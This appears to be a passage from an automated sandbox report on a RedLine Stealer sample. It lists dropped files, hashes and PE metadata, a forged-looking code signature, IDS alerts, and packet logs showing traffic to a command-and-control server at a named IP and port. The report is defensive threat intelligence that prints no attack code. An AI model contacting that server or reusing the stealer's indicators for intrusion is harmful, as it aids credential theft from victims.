                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpCCD6.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDEC6.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDED7.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpDFB8.tmp

                      Download File
                      Process:C:\Users\user\AppData\Roaming\ECcZgk.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpFC7B.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\tmpFCAB.tmp

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      C:\Users\user\AppData\Roaming\ECcZgk.exe

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):677896
                      Entropy (8bit):7.722996130421442
                      Encrypted:false
                      SSDEEP:12288:qUzjLf30WH0TwOqp0zjzY/iAGqaOxlwcR1+br5lBr+CFcUhkR:1jj0ywkp5jGq9CBbrvcCet
                      MD5:1BAC686FAC8C55F6824923FD43CA0D9E
                      SHA1:C2DB9AADE40EBEA1DF1C7FFC3622842CD0CC85A5
                      SHA-256:C313A6EFB824F05959851B88151E1070BBC84CBCD5C98BE75256678BB8EDADA4
                      SHA-512:B7899B916E621D33DF83BE2415DC818E8D942355ACE6D72295CCD9C417F6FDC8976C7C60A5900C7504A8622944DF510246B29EEC1B9B5AA0AC8A3D363560A2AD
                      Malicious:true
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g{.f..............0...... ......>.... ... ....@.. .......................`............@.....................................O.... ..............."...6...@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@....... ..............@..B................ .......H.......... .......E...................................................z..}.....($......(.......}....*..0............{....o%...o&.....,..o'......+....,...{....r...po(....+y.{....o'..........,...{....r)..po(....+Qr...pr...p(*..........,..+6.{....{......oB.....{....rB..p.()...o(.....{....o%....*..0..+.........,..{.......+....,...{....o*.......(+....*..0............s,...}.....s-...}.....s....}.....s....}.....(/.....{.... ......s0...o1.....{....r...po2.....{...../..s3...o4.....{

                      C:\Users\user\AppData\Roaming\ECcZgk.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\l2rMtmFkD6.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.722996130421442
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      • Win32 Executable (generic) a (10002005/4) 49.97%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:l2rMtmFkD6.exe
                      File size:677'896 bytes
                      MD5:1bac686fac8c55f6824923fd43ca0d9e
                      SHA1:c2db9aade40ebea1df1c7ffc3622842cd0cc85a5
                      SHA256:c313a6efb824f05959851b88151e1070bbc84cbcd5c98be75256678bb8edada4
                      SHA512:b7899b916e621d33df83be2415dc818e8d942355ace6d72295ccd9c417f6fdc8976c7c60a5900c7504a8622944df510246b29eec1b9b5aa0ac8a3d363560a2ad
                      SSDEEP:12288:qUzjLf30WH0TwOqp0zjzY/iAGqaOxlwcR1+br5lBr+CFcUhkR:1jj0ywkp5jGq9CBbrvcCet
                      TLSH:4DE402C1A3A03F59C8BB56B605690DE65BF07C2AA631D2919FC172FF1CB3741AA21347
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...g{.f..............0...... ......>.... ... ....@.. .......................`............@................................

                      File Icon

                      Icon Hash:9c306e8c8cb682ac

                      Static PE Info

                      General

                      Entrypoint:0x4a1f3e
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66D67B67 [Tue Sep 3 02:58:47 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Authenticode Signature

                      Signature Valid:false
                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                      Signature Validation Error:The digital signature of the object did not verify
                      Error Number:-2146869232
                      Not Before, Not After
                      • 13/11/2018 01:00:00 09/11/2021 00:59:59
                      Subject Chain
                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                      Version:3
                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                      Serial:7C1118CBBADC95DA3752C46E47A27438

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa1eec0x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x1de8.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0xa22000x3608
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x9ff440xa00006e51ae3bafe6ed0ce45955a3a311e125False0.8377792358398437data7.724539676194917IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0xa20000x1de80x1e005ac6c0d6b50389960ed5e5b63d0fbe80False0.825390625data7.360149909497941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0xa40000xc0x20078498c6f9ecfc105cc1e9abb0a5bd826False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_ICON0xa21600x1745PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9288232331710593
                      RT_GROUP_ICON0xa38a80x14data0.9
                      RT_GROUP_ICON0xa38bc0x14data1.05
                      RT_VERSION0xa38d00x32cdata0.42857142857142855
                      RT_MANIFEST0xa3bfc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-08T13:34:07.675915+02002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.549706185.222.58.23355615TCP
                      2024-09-08T13:34:12.815267+02002045000ET MALWARE RedLine Stealer - CheckConnect Response1185.222.58.23355615192.168.2.549706TCP
                      2024-09-08T13:34:13.182629+02002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.549706185.222.58.23355615TCP
                      2024-09-08T13:34:16.091559+02002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound1185.222.58.23355615192.168.2.549706TCP
                      2024-09-08T13:34:16.501330+02002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.549708185.222.58.23355615TCP
                      2024-09-08T13:34:17.207148+02002849662ETPRO MALWARE RedLine - CheckConnect Request1192.168.2.549709185.222.58.23355615TCP
                      2024-09-08T13:34:22.483900+02002045000ET MALWARE RedLine Stealer - CheckConnect Response1185.222.58.23355615192.168.2.549709TCP
                      2024-09-08T13:34:22.843900+02002849351ETPRO MALWARE RedLine - EnvironmentSettings Request1192.168.2.549709185.222.58.23355615TCP
                      2024-09-08T13:34:26.050350+02002045001ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound1185.222.58.23355615192.168.2.549709TCP
                      2024-09-08T13:34:26.465626+02002849352ETPRO MALWARE RedLine - SetEnvironment Request1192.168.2.549718185.222.58.23355615TCP
                      2024-09-08T13:34:27.965773+02002848200ETPRO MALWARE RedLine - GetUpdates Request1192.168.2.549719185.222.58.23355615TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 8, 2024 13:34:07.023085117 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:07.028044939 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:07.028119087 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:07.073009014 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:07.077909946 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:07.426143885 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:07.431030989 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:07.625643969 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:07.675915003 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:07.752206087 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:07.800949097 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:12.810308933 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:12.815267086 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:12.980317116 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:12.980576038 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:12.985379934 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:13.182468891 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:13.182495117 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:13.182504892 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:13.182629108 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:13.182771921 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:13.182784081 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:13.182838917 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:13.269073009 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:13.316569090 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.086381912 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.086790085 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.091558933 CEST5561549706185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.091588974 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.091629982 CEST4970655615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.091718912 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.092364073 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.097105026 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.441925049 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.447048903 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447063923 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447073936 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447082043 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447093010 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447119951 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447129011 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447165966 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447176933 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447196007 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.447202921 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.447267056 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.452020884 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.452080011 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.452089071 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.452097893 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.452101946 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.452107906 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.452178955 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.452219009 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.497596025 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.501329899 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.520009041 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.520176888 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525070906 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525152922 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525187016 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525206089 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525224924 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525233984 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525243044 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525254011 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525275946 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525280952 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525293112 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525321007 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525322914 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525333881 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525341988 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525351048 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525361061 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525388956 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525398016 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525403976 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525408983 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525424957 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525437117 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525444031 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525453091 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525470018 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525485039 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525500059 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525541067 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525547981 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525578022 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525592089 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525634050 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525655985 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525677919 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525723934 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525726080 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525774956 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525820971 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525824070 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.525861979 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.525913954 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.530179024 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530205011 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530258894 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.530339956 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530349970 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530361891 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530396938 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.530448914 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.530515909 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530560970 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.530594110 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530603886 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530616999 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530637026 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.530661106 CEST4970855615192.168.2.5185.222.58.233
                      Sep 8, 2024 13:34:16.530715942 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530832052 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530862093 CEST5561549708185.222.58.233192.168.2.5
                      Sep 8, 2024 13:34:16.530881882 CEST4970855615192.168.2.5185.222.58.233
